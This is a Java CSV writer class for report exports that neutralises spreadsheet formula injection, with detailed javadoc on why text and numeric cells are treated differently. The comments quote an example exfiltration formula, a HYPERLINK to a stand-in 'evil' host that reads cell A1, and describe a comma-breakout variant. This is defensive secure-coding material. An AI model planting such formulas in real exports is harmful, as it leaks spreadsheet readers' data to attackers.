package com.hamstrack.report.csv;

import java.math.BigDecimal;
import java.time.OffsetDateTime;
import java.time.ZoneOffset;
import java.util.List;

/**
 * The CSV mechanics for report exports (HD-141 R7): a byte-order mark, {@code #} comment lines,
 * one header row, RFC 4180 quoting, and <strong>spreadsheet formula neutralisation on text
 * cells only</strong>.
 *
 * <p><strong>Text and scalars are two kinds of cell, and the distinction is a security control
 * rather than formatting taste.</strong> A CSV field whose first character is {@code =},
 * {@code +}, {@code -}, {@code @}, a tab or a carriage return is evaluated as a formula by Excel,
 * LibreOffice and Google Sheets when the file is opened - so an issue titled
 * {@code =HYPERLINK("https://evil/"&A1,"Q3 plan")} becomes a live exfiltration link in the
 * reader's spreadsheet, and the attacker only needs to be able to name an issue in a project the
 * victim can report on. Quoting does <em>not</em> mitigate it: the CSV parser strips the quotes
 * before the formula engine sees the value. The mitigation is to prefix the value with an
 * apostrophe, which the formula engine reads as "the rest is literal text".
 *
 * <p>Applying that blindly to every cell would be worse than the bug: {@code net}, a scope
 * {@code delta} and any negative value legitimately begin with {@code -}, and prefixing one turns
 * a number into text - a spreadsheet full of values that will not sum, which is precisely the
 * "these numbers don't match" failure this epic is built to avoid. So the guard is applied to
 * {@link #text} cells and never to numeric ones. Every non-text cell this class emits is
 * generated by the server from a typed value ({@code Number}, {@code Boolean}, {@code UUID}, a
 * date-time, an enum), so it cannot carry attacker input; every string that can carry attacker
 * input (an issue title, a sprint name, a status name, a project name) goes through the text
 * path. {@link #row(Object...)} makes that dispatch on the runtime type, so a caller cannot pick
 * the wrong one by hand, and {@link #number} takes a {@link Number} so a caller cannot hand a
 * string to the unguarded path even deliberately.
 *
 * <p><strong>Every line in this file is cells - the comment block included.</strong> A {@code #}
 * line is one quoted cell rather than raw text, because "the line begins with {@code #}, so the
 * whole cell is text" is true of the FIRST cell and of nothing else: an unquoted line is split on
 * commas like any other row, and the cell after the comma can begin with {@code =}. See
 * {@link #comment}.
 *
 * <p><strong>Null is an empty unquoted field, not {@code ""} and not {@code "null"}.</strong>
 * Reports have honest gaps - a cycle time with no start, a suppressed percentile, a sprint with
 * no completion date - and an empty field is the one representation every spreadsheet and every
 * dataframe library reads back as "missing" rather than as the four-character string
 * {@code null}.
 *
 * <p><strong>The file opens with a UTF-8 BOM.</strong> Excel on Windows otherwise decodes a
 * UTF-8 CSV as the system code page and mangles every non-ASCII issue title, which for this
 * product's users is most of them. The cost is that a strict RFC 4180 parser sees three extra
 * bytes on the first line; the common readers (Excel, LibreOffice, Sheets, {@code pandas} with
 * {@code utf-8-sig}, R) all strip it. Given the audience of a download button, the mangled-titles
 * failure is both more likely and more damaging than the stray-BOM one.
 *
 * <p>Line endings are CRLF, as RFC 4180 requires; every reader accepts them, and Excel is the one
 * that cares.
 */
public final class CsvWriter {

    /** U+FEFF, the UTF-8 byte-order mark - see the class javadoc for why it is here. */
    public static final String BOM = Character.toString(0xFEFF);

    /**
     * What a comment line looks like on the wire: a double quote, then {@code #}. The quote is
     * part of the format (see {@link #comment}), so anything that reads these files back - the
     * test helpers, a parser someone writes from the docs - matches on this rather than on
     * {@code #} alone.
     */
    public static final String COMMENT_PREFIX = "\"#";

    /** RFC 4180 section 2.1. */
    private static final String EOL = "\r\n";

    /**
     * The leading characters a spreadsheet treats as the start of a formula. {@code \r} and
     * {@code \t} are included because Excel accepts them as leading whitespace before a
     * {@code =}, which is enough to slip a value past a naive first-character check.
     */
    private static final String FORMULA_LEAD = "=+-@\t\r";

    private final StringBuilder out = new StringBuilder(1024).append(BOM);

    /**
     * A {@code # key: value} line in the comment header - the block section 4.4 requires to carry
     * project, window, measure, {@code computedAt} and {@code basedOnIssues}.
     *
     * <p><strong>The whole line is emitted as one quoted text cell, {@code #} included.</strong>
     * Round 1 argued it needed no formula guard because "the line already begins with {@code #},
     * so the whole cell is text to every spreadsheet however the value starts" - which is true of
     * the FIRST cell and of nothing else. An unquoted line is split on commas like any other row,
     * so a project named {@code Acme, =HYPERLINK(...)} ends the {@code #} cell at the comma and
     * opens a second one that starts with {@code =}: a live formula on a header line, with the
     * project id, the sprint id and the report's numbers in the neighbouring cells for it to
     * read. Comma-free payloads are the norm for this class, so the single comma the breakout
     * costs is not a barrier - and nothing restricts {@code ,} or {@code =} in a project or
     * sprint name, nor should it.
     *
     * <p>Quoting the line makes "a comment line is one cell" true by construction rather than
     * assumed, and it makes {@link #note} safe the same way - which matters, because the next
     * honesty line to interpolate a value will not stop to think about this.
     *
     * <p>Line breaks are still flattened. A quoted field may legally contain one, but a header
     * block that spans physical lines stops being readable in the plain-text view that is the
     * point of the block, and a line-oriented reader would take the remainder for a data row.
     *
     * <p>The cost, taken deliberately: {@code #} sits inside the quotes, so a reader configured
     * to drop {@code #}-comment lines sees them as one-column rows instead. The block is
     * documented as data to match on ({@code docs/api-*.md}: "match on the {@code # key: value}
     * shape"), never as something a parser is expected to skip.
     */
    public CsvWriter comment(String key, Object value) {
        return line("# " + oneLine(key) + ": " + oneLine(render(value)));
    }

    /** A free-standing {@code # ...} note - used for the honesty lines (suppression, truncation). */
    public CsvWriter note(String text) {
        return line("# " + oneLine(text));
    }

    /** One comment line, quoted whole so that nothing inside it can open a second cell. */
    private CsvWriter line(String comment) {
        out.append(text(comment)).append(EOL);
        return this;
    }

    /**
     * The single column-name row.
     *
     * <p>Every name goes through {@link #text}, though all six lists are compile-time constants
     * today. The first report to export a custom-field column - and this product has a
     * custom-field subsystem - makes a column name a string an admin typed, which is exactly the
     * input the text path exists for. A guard that holds only while a list stays constant is one
     * feature away from not holding.
     */
    public CsvWriter columns(List<String> columns) {
        for (int i = 0; i < columns.size(); i++) {
            if (i > 0) {
                out.append(',');
            }
            out.append(text(columns.get(i)));
        }
        out.append(EOL);
        return this;
    }

    /**
     * One data row. Each cell is dispatched on its runtime type: a {@code String} is attacker
     * input until proven otherwise and is quoted and neutralised; everything else is a value the
     * server generated and is written bare. See the class javadoc for why that split is the whole
     * point of this class.
     */
    public CsvWriter row(Object... cells) {
        for (int i = 0; i < cells.length; i++) {
            if (i > 0) {
                out.append(',');
            }
            out.append(cells[i] instanceof String s ? text(s) : render(cells[i]));
        }
        out.append(EOL);
        return this;
    }

    public String toCsv() {
        return out.toString();
    }

    /**
     * A text cell: formula-neutralised, always quoted, inner quotes doubled.
     *
     * <p>Always quoting rather than only-when-needed is a simplification with a safety payoff -
     * there is no path through this method that emits a bare field, so a comma, a quote or a
     * newline in a title cannot shift the remaining columns of a row by one.
     */
    static String text(String value) {
        if (value == null) {
            return "";
        }
        var guarded = !value.isEmpty() && FORMULA_LEAD.indexOf(value.charAt(0)) >= 0
                ? "'" + value
                : value;
        return '"' + guarded.replace("\"", "\"\"") + '"';
    }

    /**
     * A number rendered the way this file renders numbers - for building fragments of comment
     * lines ({@code "p50=" + number(pair.p50())}), so a percentile in the header reads exactly as
     * one in a cell does.
     *
     * <p><strong>It takes a {@link Number} rather than an {@code Object} on purpose.</strong> The
     * {@code scalar(Object)} it replaces rendered a {@code String} unquoted and unguarded. That
     * was correct for all five fragment call sites and one keystroke from being used to build a
     * <em>cell</em>, at which point an issue title would have reached the file bare - and five
     * existing callers is how a seam gets used. A parameter type the compiler enforces means the
     * only way to put a string in this file is {@link #text}.
     */
    static String number(Number value) {
        return render(value);
    }

    private static String render(Object value) {
        return switch (value) {
            case null -> "";
            case String s -> s;
            case BigDecimal d -> d.stripTrailingZeros().toPlainString();
            case Double d -> BigDecimal.valueOf(d).stripTrailingZeros().toPlainString();
            case Float f -> BigDecimal.valueOf(f).stripTrailingZeros().toPlainString();
            case OffsetDateTime t -> t.withOffsetSameInstant(ZoneOffset.UTC).toString();
            case Enum<?> e -> e.name();
            default -> String.valueOf(value);
        };
    }

    /** Flattens the characters that would end a comment line early. */
    private static String oneLine(String value) {
        return value == null ? "" : value.replace('\r', ' ').replace('\n', ' ');
    }
}
